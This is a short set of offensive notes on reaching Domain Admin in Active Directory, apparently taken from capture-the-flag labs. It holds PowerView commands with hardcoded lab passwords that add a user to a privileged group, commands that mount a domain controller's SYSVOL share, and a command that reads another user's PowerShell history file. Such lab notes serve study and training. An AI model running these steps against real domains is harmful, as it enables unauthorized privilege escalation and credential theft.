Domain Admin Techniques
Post

Domain Admin Techniques

This is a collection of techniques to get Domain Admin via multiple techniques.

Assign user to a group

1
2
3
4
5
6
Import-Module ./PowerView.ps1
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\\JDgodd"
Add-DomainGroupMember -Identity 'Core Staff' -Members 'streamio\\JDgodd' -Credential $Cred
net group 'Core Staff'

Examples: [[StreamIO#dc6ecc]]

SYSVOL Share DC

We can enumerate SMB Shares within the machine: ^cae2ef

1
2
3
4
5
6
7
PS C:\Users\BTables\Desktop> Get-SMBShare

Name   ScopeName Path Description  
----   --------- ---- -----------  
ADMIN$ *              Remote Admin 
C$     *              Default share
IPC$   *              Remote IPC 

We can try to connect to the shares on the DC:

1
2
PS C:\Users\BTables\Desktop> net use \\dc.fulcrum.local\IPC$ /user:FULCRUM\BTables ++FileServerLogon12345++
The command completed successfully.

And then we can list the shares in the DC:

1
2
3
4
5
6
7
PS C:\Users\BTables\Desktop> net view \\dc.fulcrum.local\
Shared resources at \\dc.fulcrum.local\
Share name  Type  Used as  Comment              
-------------------------------------------------------------------------------
NETLOGON    Disk           Logon server share   
SYSVOL      Disk           Logon server share   
The command completed successfully.

We can then mount the share SYSVOL on the compromised machine to check its content:

1
2
3
PS C:\Users\BTables\Desktop> net use x: \\dc.fulcrum.local\SYSVOL /user:FULCRUM\BTables ++FileServerLogon12345++

The command completed successfully.

And we found a ton of scripts inside the Share:

1
2
3
4
5
6
7
PS X:\fulcrum.local\scripts> dir
    Directory: X:\fulcrum.local\scripts

Mode                LastWriteTime         Length Name
----                -------------         ----- -----                                                                                                                      
-a----        2/12/2022  10:34 PM            340 00034421-648d-4835-9b23-c0d315d71ba3.ps1
-a----        2/12/2022  10:34 PM            340 0003ed3b-31a9-4d8f-a152-a234ecb522d4.ps1

Powershell History

We can retrieve commands executed on another machine by checking the ConsoleHost_history.txt which is the same as in Linux .bash_history file. #Note If using this command we need to be on the User’s folder since this file is located in the AppData folder:

1
PS C:\Users\legacyy> type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Examples: Timelapse